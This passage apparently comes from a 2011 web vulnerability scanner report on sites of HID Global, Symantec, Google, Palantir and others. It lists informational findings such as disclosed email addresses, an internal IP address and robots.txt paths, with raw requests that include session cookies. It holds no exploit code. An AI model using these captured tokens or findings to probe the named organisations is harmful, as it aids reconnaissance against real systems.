GET /lightbox_page.php?page_id=296&height=475&width=500&random=1297709274228 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
Cache-Control: no-cache
Host: www.hidglobal.com
Cookie: PHPSESSID=oqdoeilmq8hpvmm2juqttqi523
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2745
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-T
...[SNIP]...
<a href="mailto:mfglotz@hidglobal.com" target="_blank" onclick="var s=s_gi(s_account); s.linkTrackVars='prop19,events'; s.linkTrackEvents='event12'; s.prop19='contact marie'; s.events='event12'; s.tl(this,'o','IDS Contact page');">mfglotz@hidglobal.com</a>
...[SNIP]...

18.13. http://www.hidglobal.com/onlineOrderStatusRegistration.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /onlineOrderStatusRegistration.php HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<OPTION value='hidorderstatus@hidglobal.com' >
...[SNIP]...
<OPTION value='hidorderstatus@hidglobal.com'>
...[SNIP]...
<OPTION value='hidminorderstatus@hidglobal.com'>
...[SNIP]...
<OPTION value='hidorderstatus@hidglobal.com'>
...[SNIP]...
<OPTION value='hidorderstatus@hidglobal.com'>
...[SNIP]...
<OPTION value='hidorderstatus@hidglobal.com'>
...[SNIP]...

18.14. http://www.hidglobal.com/wordpress/wp-content/themes/HID/js/pngfix.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /wordpress/wp-content/themes/HID/js/pngfix.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wordpress/wp-content/themes/HID/js/pngfix.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hidglobal.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:44:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Apr 2010 19:10:02 GMT
ETag: "c4cc46-1b77-48550c1ca9680"
Accept-Ranges: bytes
Content-Length: 7031
Connection: close
Content-Type: application/x-javascript

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

18.15. http://www.symantec.com/connect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The following email address was disclosed in the response:

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710248275-New%7C1318446248275%3B%20event69%3Devent69%7C1318446248276%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 18:40:51 +0000
Vary: Cookie
ETag: "1297708851"
Content-Type: text/html; charset=utf-8
X-Varnish: 1761088787 1761078414
X-Varnish-Cache: HIT
X-Varnish-Hits: 142
Vary: Accept-Encoding
Cache-Control: public, max-age=2230
Date: Mon, 14 Feb 2011 19:03:57 GMT
Connection: close
Content-Length: 86900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<a href="/connect/user/2004171">truongvannay@yahoo.com</a>
...[SNIP]...

18.16. http://www.symantec.com/connect/sites/default/files/js/js_ce1ab1011cf68c3127d928b4413d3407.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/files/js/js_ce1ab1011cf68c3127d928b4413d3407.js

Issue detail

The following email address was disclosed in the response:

Request

GET /connect/sites/default/files/js/js_ce1ab1011cf68c3127d928b4413d3407.js HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710248275-New%7C1318446248275%3B%20event69%3Devent69%7C1318446248276%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 11 Feb 2011 02:55:45 GMT
ETag: "c9a010c-27ecc-49bf8d59eee40"
Content-Type: application/x-javascript
X-Varnish: 1758835925 1758835550
X-Varnish-Cache: HIT
X-Varnish-Hits: 3
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:03:57 GMT
Connection: close
Content-Length: 163532

// $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
...[SNIP]...
<jesus.carrera@trafficbroker.co.uk>
...[SNIP]...

19. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=43=obiPR5hLYFuxjHFaBKfW93ixnZDQ-VMz_DH1OlhaN-yePLjFDeS8n93BL0uLr8ZZRP1Q-oGTfRDUq959OW02bwIfnCKUYL1o77VaRxDLU1bMGiX_J_d5VFYuaFXTSXGL; PREF=ID=11a9f75446a95c33:U=af2eb0fc870398cf:FF=0:TM=1293845297:LM=1297558495:GM=1:S=6ZwDDuC1wBKi7F_t
If-Modified-Since: Sat, 12 Feb 2011 21:55:19 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Sun, 13 Feb 2011 01:45:01 GMT
Date: Mon, 14 Feb 2011 18:56:14 GMT
Expires: Mon, 14 Feb 2011 18:56:14 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...

20. Robots.txt file  previous  next
There are 12 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


20.1. http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/libs/jqueryui/1.8.4/jquery-ui.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Mon, 14 Feb 2011 18:45:29 GMT
Expires: Mon, 14 Feb 2011 18:45:29 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

20.2. http://clients1.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 08 Feb 2011 00:50:45 GMT
Date: Mon, 14 Feb 2011 18:28:58 GMT
Expires: Mon, 14 Feb 2011 18:28:58 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

20.3. http://hidglobal.122.2o7.net/b/ss/hidprod/1/H.21/s88918623856734  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hidglobal.122.2o7.net
Path:   /b/ss/hidprod/1/H.21/s88918623856734

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hidglobal.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:03 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "d111a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www54
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.4. http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.hidglobal.com
Path:   /b/ss/hidprod/1/H.19.4/s85479820847976

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.hidglobal.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:44 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1844b2-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www355
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.5. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 08 Feb 2011 00:50:45 GMT
Date: Mon, 14 Feb 2011 18:31:45 GMT
Expires: Mon, 14 Feb 2011 18:31:45 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

20.6. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 08 Feb 2011 00:50:45 GMT
Date: Mon, 14 Feb 2011 18:29:49 GMT
Expires: Mon, 14 Feb 2011 18:29:49 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

20.7. https://www-secure.symantec.com/connect/symantec_symaccount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /connect/symantec_symaccount

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www-secure.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Thu, 28 Jan 2010 22:18:41 GMT
ETag: "1b-4b620d41"
Content-Type: text/plain
Cache-Control: public, max-age=9392
Date: Mon, 14 Feb 2011 19:04:38 GMT
Content-Length: 27
Connection: close

User-agent:*
Disallow:/*

20.8. http://www.b2i.us/blank.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /blank.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.b2i.us

Response

HTTP/1.1 200 OK
Content-Length: 162
Content-Type: text/plain
Last-Modified: Mon, 11 Aug 2008 23:00:02 GMT
Accept-Ranges: none
ETag: "a859c1fc5fcc81:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:10 GMT
Connection: close
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

User-agent: *
Disallow: /images/
Disallow: /vercast/
Disallow: /w3c/
Disallow: /webcast/
Disallow: /Profiles/images/

User-agent: ia_archiver
Disallow: /

20.9. http://www.businesswire.com/portal/site/home/membership/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /portal/site/home/membership/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.businesswire.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:19 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 23:21:42 GMT
ETag: "38d1e-dcd-4922345f46d80"
Accept-Ranges: bytes
Content-Length: 3533
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.businesswire.com/smaps/gn-bw/gn-bw.xml
Sitemap: http://www.businesswire.com/smaps/smaps-bw/smap-bw.xml
Sitemap: http://eon.businesswire.com/smaps/gn-eon/gn-eon.xml
Si
...[SNIP]...

20.10. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 14 Feb 2011 18:29:02 GMT
Expires: Mon, 14 Feb 2011 18:29:02 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

20.11. http://www.hidglobal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hidglobal.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:28:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 31 Jan 2011 23:45:02 GMT
ETag: "ac826a-80b-49b2d0126db80"
Accept-Ranges: bytes
Content-Length: 2059
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
User-agent: ia_archiver
Disallow: /
User-Agent: *
Disallow: /russian/registration/
Disallow: /admin/
Disallow: /smart/
Disallow: /includes_common2/
Disallow: /portugues/images/

...[SNIP]...

20.12. http://www.webcastir.com/SlideShowView.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcastir.com
Path:   /SlideShowView.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webcastir.com

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: text/plain
Last-Modified: Mon, 26 Feb 2007 18:07:04 GMT
Accept-Ranges: none
ETag: "2a970ebd059c71:4ce"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 18:42:18 GMT
Connection: close
Set-Cookie: Coyote-2-426f6d68=426f6d2d:0; path=/

User-agent: *
Disallow: /

User-agent: ia_archiver
Disallow: /

21. Cacheable HTTPS response  previous  next
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


21.1. https://support.palantir.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.palantir.com
Path:   /

Request

GET / HTTP/1.1
Host: support.palantir.com
Connection: keep-alive
Referer: http://www.palantirtech.com/about
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:50 GMT
Server: Apache
Last-Modified: Sat, 04 Oct 2008 01:41:25 GMT
ETag: "e1018c-332-458638c423b40"
Accept-Ranges: bytes
Content-Length: 818
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<html>
<head>
   <title>Palantir Technologies Support</title>
   <style type="text/css">
   
   h1, h2, h3 {
       text-align: center;
   }
   
   h1, h2 {
       margin: 0;
   }
   
   h1 {
       font-size: 2em;
   }
   
   h2 {
       font-si
...[SNIP]...

21.2. https://support.palantir.com/pg/login.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.palantir.com
Path:   /pg/login.do

Request

GET /pg/login.do HTTP/1.1
Host: support.palantir.com
Connection: keep-alive
Referer: https://support.palantir.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F3A71652B86046597A441E158CEE25D6

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

21.3. https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www-secure.symantec.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; SESSfb1d8525d94d660bc8f92b8419fd5ae1=0a7468d0124fbe8fc54c8398bc4f1e8d; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT
ETag: "a680e3-47e-491d5c7eb70c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Mon, 14 Feb 2011 19:04:50 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 1150

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

22. HTML does not specify charset  previous  next
There are 11 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

